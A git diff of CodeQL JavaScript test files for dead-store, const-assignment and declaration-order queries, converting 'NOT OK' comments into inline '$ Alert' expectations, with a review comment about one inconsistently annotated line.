diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.qlref b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.qlref index a9c879e52c68..0003a1f3c6f5 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.qlref +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.qlref @@ -1 +1,2 @@ -Declarations/AssignmentToConst.ql \ No newline at end of file +query: Declarations/AssignmentToConst.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js index 93bb382719f5..5a8866778884 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js @@ -1,4 +1,3 @@ const C = 45; -// NOT OK -class C {} +class C {} // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js index 5f022c603b78..3997e1366e7f 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js @@ -1,4 +1,4 @@ -// OK: `const` is block scoped in ECMAScript 2015 +// OK - `const` is block scoped in ECMAScript 2015 function f() { { const val = 1; diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js index e23c770f2ad1..130f0278d657 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js @@ -1,4 +1,3 @@ const C = 45; -// NOT OK -function C() {} +function C() {} // $ Alert 
diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js index 929a95754f81..5f66a500f8b5 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js @@ -1,2 +1 @@ -// OK -const s = "there"; \ No newline at end of file +const s = "there"; diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js index c68d2380e017..fc40d5d3650c 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js @@ -1,26 +1,22 @@ const x = 23, y = 42; -// NOT OK -x = 42; +x = 42; // $ Alert -// NOT OK -y = 23; +y = 23; // $ Alert -// NOT OK -var y = -1; +var y = -1; // $ Alert -// NOT OK -++x; +++x; // $ Alert var z = 56; -// OK + z = 72; -// OK + const s = "hi"; (function (){ const c = null; - for ([ c ] of o); + for ([ c ] of o); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected index 7063b316a62e..501e442bcbf2 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected @@ -1 +1 @@ -| tst.js:3:24:3:36 | key = iter[1] | This initialization of key overwrites an $@. | tst.js:3:9:3:21 | key = iter[0] | earlier initialization | +| tst.js:2:24:2:36 | key = iter[1] | This initialization of key overwrites an $@. | tst.js:2:9:2:21 | key = iter[0] | earlier initialization | 
diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.qlref b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.qlref index 09f107b9c2de..f93499b1f13e 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.qlref +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.qlref @@ -1 +1,2 @@ -Declarations/ClobberingVarInit.ql \ No newline at end of file +query: Declarations/ClobberingVarInit.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js index 00ca7e51f7cf..c1060f0280ab 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js @@ -1,12 +1,11 @@ for (var iter in Iterator(aExtraHeaders)) { - // NOT OK - var key = iter[0], key = iter[1]; + var key = iter[0], key = iter[1]; // $ Alert xhr.setRequestHeader(key, value); } -// OK + var tmp = f(), tmp = tmp + 19; -// OK + var a, b, a = 42; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/ConflictingFunctions.qlref b/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/ConflictingFunctions.qlref index fc7a36de5226..5bef6c78f6a8 100644 --- a/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/ConflictingFunctions.qlref +++ b/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/ConflictingFunctions.qlref @@ -1 +1,2 @@ -Declarations/ConflictingFunctions.ql \ No newline at end of file +query: Declarations/ConflictingFunctions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/tst.js b/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/tst.js index 5b6ec033a8ad..4ab06d946b95 100644 --- a/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/tst.js +++ b/javascript/ql/test/query-tests/Declarations/ConflictingFunctions/tst.js @@ -1,6 +1,6 @@ function f(x) { if (x > 23) { - function g() { + function g() { // $ Alert return 42; } } else { diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected index 3c4777ca5a6f..d4f34fa75983 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected @@ -1,2 +1,2 @@ -| tst.js:2:1:2:1 | g | This definition of g is useless, since its value is never read. | +| tst.js:1:1:1:1 | g | This definition of g is useless, since its value is never read. | | worker.js:3:1:3:9 | onmissage | This definition of onmissage is useless, since its value is never read. | diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.qlref b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.qlref index e24cf1256f74..7ccb2ebe73ef 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.qlref +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.qlref @@ -1 +1,2 @@ -Declarations/DeadStoreOfGlobal.ql \ No newline at end of file +query: Declarations/DeadStoreOfGlobal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js index 6628880d6c55..5dc730c2d4c5 100644 
--- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js @@ -1,31 +1,23 @@ -// NOT OK -g = 23; +g = 23; // $ Alert -// OK h = 23; alert(h); -// OK uid = 0; function incr() { return uid++; } -// OK function foo() { var x; x = 0; } -// OK onload = function() {} -// OK global = 42; -// OK prop = 42; -// OK /*global otherGlobal*/ -otherGlobal = 56; \ No newline at end of file +otherGlobal = 56; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/worker.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/worker.js index d8fec2d35077..d7baebc8443c 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/worker.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/worker.js @@ -1,3 +1,3 @@ onmessage = function() { console.log("Got a message!"); }; -onmissage = function() { console.log("How did that happen?"); }; \ No newline at end of file +onmissage = function() { console.log("How did that happen?"); }; // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected index 88b5fc55b25c..8d5b7af35dab 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected 
@@ -1,13 +1,13 @@ | overload.ts:10:12:10:14 | baz | The value assigned to baz here is unused. | -| tst2.js:26:9:26:14 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst2.js:28:9:28:14 | x = 42 | The value assigned to x here is unused. | -| tst3.js:2:1:2:36 | exports ... a: 23 } | The value assigned to exports here is unused. | -| tst3b.js:2:18:2:36 | exports = { a: 23 } | The value assigned to exports here is unused. | -| tst.js:6:2:6:7 | y = 23 | The value assigned to y here is unused. | -| tst.js:13:6:13:11 | a = 23 | The initial value of a is unused, since it is always overwritten. | -| tst.js:13:14:13:19 | a = 42 | The value assigned to a here is unused. | -| tst.js:45:6:45:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst.js:51:6:51:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst.js:132:7:132:13 | {x} = o | The initial value of x is unused, since it is always overwritten. | -| tst.js:162:6:162:14 | [x] = [0] | The initial value of x is unused, since it is always overwritten. | -| tst.js:172:7:172:17 | nSign = foo | The value assigned to nSign here is unused. | +| tst2.js:25:9:25:14 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst2.js:27:9:27:14 | x = 42 | The value assigned to x here is unused. | +| tst3.js:1:1:1:36 | exports ... a: 23 } | The value assigned to exports here is unused. | +| tst3b.js:1:18:1:36 | exports = { a: 23 } | The value assigned to exports here is unused. | +| tst.js:5:2:5:7 | y = 23 | The value assigned to y here is unused. | +| tst.js:11:6:11:11 | a = 23 | The initial value of a is unused, since it is always overwritten. | +| tst.js:11:14:11:19 | a = 42 | The value assigned to a here is unused. | +| tst.js:43:6:43:11 | x = 23 | The initial value of x is unused, since it is always overwritten. 
| +| tst.js:49:6:49:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst.js:130:7:130:13 | {x} = o | The initial value of x is unused, since it is always overwritten. | +| tst.js:160:6:160:14 | [x] = [0] | The initial value of x is unused, since it is always overwritten. | +| tst.js:170:7:170:17 | nSign = foo | The value assigned to nSign here is unused. | diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.qlref b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.qlref index eb773fe0490a..9c9da7e09a35 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.qlref +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.qlref @@ -1 +1,2 @@ -Declarations/DeadStoreOfLocal.ql \ No newline at end of file +query: Declarations/DeadStoreOfLocal.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts index c97993c88a51..3dfc6b0e2e54 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts @@ -1,11 +1,11 @@ import dummy from 'dummy'; -var key1 = "key1"; // OK +var key1 = "key1"; export class NoConstructor { [key1] = 4; } -var key2 = "key2"; // OK +var key2 = "key2"; export class WithConstructor { [key2] = 4; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts index 90199399794d..2f93aba1b9c7 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts 
+++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts @@ -1,16 +1,16 @@ -import { Foo } from "./exportSymbol" // OK +import { Foo } from "./exportSymbol" export interface FooMap { - [Foo]: number; // OK + [Foo]: number; } -const Bar = "Bar"; // OK +const Bar = "Bar"; export interface BarMap { [Bar]: number; } -const Baz = "Baz"; // OK +const Baz = "Baz"; if (false) { Baz; @@ -18,7 +18,7 @@ if (false) { function getBaz(): typeof Baz { return null; } -class C {} // OK +class C {} if (false) { C; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts index 6481a749c40c..007bf441d6df 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts @@ -1,5 +1,5 @@ -var C1 = global.C1; // OK -var C2 = global.C2; // OK +var C1 = global.C1; +var C2 = global.C2; class C extends C1 {} export default class extends C2 {} diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts index 5c6b48f8796c..c8dba3d68896 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts @@ -1,3 +1,3 @@ -var C1 = global.C1; // OK +var C1 = global.C1; export default function(x=C1) {} diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js index eab95b4787f6..68b79aac8e68 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js 
@@ -1,4 +1,4 @@ -const React = require('react'); // OK: used in `extends` clause below +const React = require('react'); // OK - used in `extends` clause below class Foo extends React.Component { } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js index da26a3557ade..8e923b565ee2 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js @@ -2,7 +2,7 @@ function f() { let y = false; for (const x of [1, 2, 3]) { if (x > 0) { - y = true; // OK + y = true; continue; } return; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts index 4335cd3880aa..3d00634499f8 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts @@ -9,5 +9,5 @@ namespace a.b.q { registerSomething(c); - function foo() {} // OK + function foo() {} } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts index d2be60c12874..255c80093466 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts 
@@ -1,13 +1,13 @@ export function foo() { - function bar(x: number): number; // OK - function bar(x: string): string; // OK - function bar(x: any) { // OK + function bar(x: number): number; + function bar(x: string): string; + function bar(x: any) { return x; } - function baz(x: number): number; // OK - function baz(x: string): string; // OK - function baz(x: any) { // NOT OK, overwritten before use + function baz(x: number): number; + function baz(x: string): string; + function baz(x: any) { // $ Alert - overwritten before use return x; } baz = (x) => x; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js index f19b1656da23..31d321711cfa 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js @@ -1,17 +1,15 @@ function f() { - // OK: initialization to default value + // OK - initialization to default value var x = null, y = undefined, z; x = {}; - // NOT OK - y = 23; + y = 23; // $ Alert y = 42; for (var p in x) y+p; - // OK: assignment to global + // OK - assignment to global global = 42; - // NOT OK - var a = 23; a = 42; - // OK: captured variable + var a = 23; a = 42; // $ Alert + // OK - captured variable var b = 42; return function() { return b%2 @@ -20,14 +18,14 @@ function f() { function g() { var x; - // OK + x = 23, x += 19; - // OK + var y = 42; } function h() { - // OK + var x = false; try { this.mayThrow(); @@ -37,18 +35,18 @@ function h() { } function k(data) { - // OK + for(var i=0;i .5) - // OK + i = 23; } } 
@@ -87,11 +85,11 @@ function s() { var container = document.createElement("div"), div = document.createElement("div"); doStuffWith(container, div); - // OK + container = div = null; } -// OK: the function expression could be made anonymous, but it's not +// OK - the function expression could be made anonymous, but it's not // worth flagging this as a violation defineGetter(req, 'subdomains', function subdomains() { var hostname = this.hostname; @@ -103,7 +101,7 @@ defineGetter(req, 'subdomains', function subdomains() { return subdomains.slice(offset); }); -// OK: assigning default values +// OK - assigning default values function t() { var x; x = false; @@ -112,7 +110,7 @@ function t() { x = 42; return x; } -// OK: unnecessary initialisation as type hint +// OK - unnecessary initialisation as type hint function u() { var x; x = []; @@ -120,7 +118,7 @@ function u() { x = 42; return x; } -// OK: assigning `undefined` +// OK - assigning `undefined` function v() { var x; x = void 0; @@ -129,12 +127,12 @@ function v() { } !function(o) { - var {x} = o; + var {x} = o; // $ Alert x = 42; return x; } -// OK: assignments in dead code not flagged +// OK - assignments in dead code not flagged !function() { return; var x; @@ -159,7 +157,7 @@ function v() { }); (function() { - let [x] = [0], // OK, but flagged due to destructuring limitations + let [x] = [0], // $ SPURIOUS: Alert - flagged due to destructuring limitations y = 0; x = 42; y = 87; @@ -169,7 +167,7 @@ function v() { (function() { if (something()) { - var nSign = foo; + var nSign = foo; // $ Alert } else { console.log(nSign); } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js index 55cff458fca5..542e9ac06c35 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js 
@@ -1,5 +1,5 @@ function outer(b) { - // OK + let addSubdomain = false; if (x) { @@ -16,15 +16,14 @@ function outer(b) { } function f(event) { - // OK + var message = event.data; eme.init().then(() => NativeInfo.processApp('install', message.id)); } function g() { - // NOT OK - let x = 23; + let x = 23; // $ Alert { - x = 42; + x = 42; // $ Alert } } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js index 91a09ed03d7d..396ba397e55f 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js @@ -1,2 +1 @@ -// NOT OK -exports = module.exports = { a: 23 }; +exports = module.exports = { a: 23 }; // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js index ca9ae499600f..918b117bf273 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js @@ -1,2 +1 @@ -// NOT OK -module.exports = exports = { a: 23 }; +module.exports = exports = { a: 23 }; // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/DeadStoreOfProperty.qlref b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/DeadStoreOfProperty.qlref index 448709b9054f..935b07264eb8 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/DeadStoreOfProperty.qlref +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/DeadStoreOfProperty.qlref @@ -1 +1,2 @@ -Declarations/DeadStoreOfProperty.ql \ No newline at end of file +query: Declarations/DeadStoreOfProperty.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js index 43db65532a09..784cb1ffc328 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js @@ -1,7 +1,7 @@ class C { - static get foo() {} // OK - static set foo(v) {} // OK + static get foo() {} + static set foo(v) {} - get bar() {} // OK - set bar(v) {} // OK + get bar() {} + set bar(v) {} } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js index c4b70604781d..3bd03c882ef8 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js @@ -1,3 +1,3 @@ var exports = module.exports; -exports.answer = "yes"; // NOT OK +exports.answer = "yes"; // $ Alert exports.answer = "no"; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts index a2b922684dda..8be98d94dd00 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts @@ -1,5 +1,5 @@ class C { - f; // OK + f; constructor() { this.f = 5; @@ -7,7 +7,7 @@ class C { } class D { - f = 4; // NOT OK + f = 4; // $ Alert constructor() { this.f = 5; @@ -15,7 +15,7 @@ class D { } class G { - constructor(public h: string) { // NOT OK + constructor(public h: string) { // $ Alert this.h = h; } } 
diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js index 282f6bc7f4aa..6edb03fb4a67 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js @@ -2,7 +2,7 @@ var o = f1(); while (f2()) { if (f4()) { - o.p = 42; // NOT OK + o.p = 42; // $ Alert break; } f5(); @@ -12,8 +12,8 @@ (function(){ var o = f1(); - o.p1 = o.p1 += 42; // NOT OK - o.p2 -= (o.p2 *= 42); // NOT OK + o.p1 = o.p1 += 42; // $ Alert + o.p2 -= (o.p2 *= 42); // $ Alert }); (function(){ @@ -26,7 +26,7 @@ f3(); } catch (e) { f4(); - o.p = 42; // NOT OK + o.p = 42; // $ Alert } } o.p = 42; @@ -35,5 +35,5 @@ (function(){ var o = f1(); - o.p = f2() ? o.p = f3() : f4(); // NOT OK + o.p = f2() ? o.p = f3() : f4(); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js index 39db5056b77b..0c82a9884b44 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js @@ -1,26 +1,26 @@ (function(){ var o = {}; - o.pure1 = 42; // NOT OK + o.pure1 = 42; // $ Alert o.pure1 = 42; - o.pure2 = 42; // NOT OK + o.pure2 = 42; // $ Alert o.pure2 = 43; o.impure3 = 42; f(); o.impure3 = 42; - o.pure4 = 42; // NOT OK + o.pure4 = 42; // $ Alert 43; o.pure4 = 42; o.impure5 = 42; o.impure5 = f(); - o.pure6 = f(); // NOT OK + o.pure6 = f(); // $ Alert o.pure6 = 42; - o.pure7 = 42; // NOT OK + o.pure7 = 42; // $ Alert if(x){} o.pure7 = 42; @@ -73,7 +73,7 @@ o15.pure15_aliasWrite = 42; var o16 = x? o: null; - o.pure16_simpleAliasWrite = 42; // NOT OK + o.pure16_simpleAliasWrite = 42; // $ Alert o16.pure16_simpleAliasWrite = 42; var o17 = { 
@@ -82,57 +82,57 @@ } // DOM - o.clientTop = 42; // OK + o.clientTop = 42; o.clientTop = 42; - o.defaulted1 = null; // OK + o.defaulted1 = null; o.defaulted1 = 42; - o.defaulted2 = -1; // OK + o.defaulted2 = -1; o.defaulted2 = 42; var o = {}; - o.pure18 = 42; // NOT OK - o.pure18 = 42; // NOT OK + o.pure18 = 42; // $ Alert + o.pure18 = 42; // $ Alert o.pure18 = 42; var o = {}; - Object.defineProperty(o, "setter", { // OK + Object.defineProperty(o, "setter", { set: function (value) { } }); o.setter = ""; - var o = { set setter(value) { } }; // OK + var o = { set setter(value) { } }; o.setter = ""; var o = { - set accessor(value) { }, // OK + set accessor(value) { }, get accessor() { } }; var o = { set setter(value) { } }; - o.setter = 42; // probably OK, but still flagged - it seems fishy + o.setter = 42; // $ Alert - probably OK, but still flagged - it seems fishy o.setter = 87; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: getInitialValue()}) // NOT OK + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: getInitialValue()}) // $ Alert o.prop = 42; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: undefined}) // OK, default value + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: undefined}) // OK - default value o.prop = 42; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1}) // OK + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1}) o.prop = 42; var o = {}; - o.pure19 = 42; // OK + o.pure19 = 42; o.some_other_property = 42; o.pure19 = 42; var o = {}; - o.pure20 = 42; // OK + o.pure20 = 42; some_other_obj.some_other_property = 42; o.pure20 = 42; }); 
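Review bot: The `o.setter = 42;` line in DeadStoreOfProperty/tst.js is annotated `// $ Alert - probably OK, but still flagged - it seems fishy`, so a result the comment itself calls probably fine is recorded as a wanted alert. The comparable case in DeadStoreOfLocal/tst.js in this same commit is marked `// $ SPURIOUS: Alert - flagged due to destructuring limitations`. If the write is considered a false positive, `o.setter = 42; // $ SPURIOUS: Alert - flagged although the property has a setter` would keep the two files consistent. If the alert is intended, dropping "probably OK" from the comment would make that clear. The enclosing function expression starts outside this hunk.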
diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/DeclBeforeUse.qlref b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/DeclBeforeUse.qlref index a017c3bc5aad..cff8cc1360ff 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/DeclBeforeUse.qlref +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/DeclBeforeUse.qlref @@ -1 +1,2 @@ -Declarations/DeclBeforeUse.ql +query: Declarations/DeclBeforeUse.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js index bdb76a070b7d..29eb66403511 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js @@ -1,8 +1,8 @@ /*global w, x:true*/ /* global y*/ // not a proper JSLint global declaration, but we (and JSHint) accept it anyway /*global: z*/ // also not a proper global declaration -w; // OK -x; // OK -y; // not OK -z; // not OK +w; +x; +y; +z; // $ Alert var x, y, z; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js index 2fb118b1541e..2808e89550f5 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js @@ -1,11 +1,11 @@ function f(x) { - console.log(x); // OK + console.log(x); } -console.log(x); // NOT OK +console.log(x); // $ Alert var x = 1; function g() { - console.log(y); // OK (not in same function) + console.log(y); // OK - not in same function } var y = 1; diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts index 0de18d48a482..f949cd26fc76 100644 
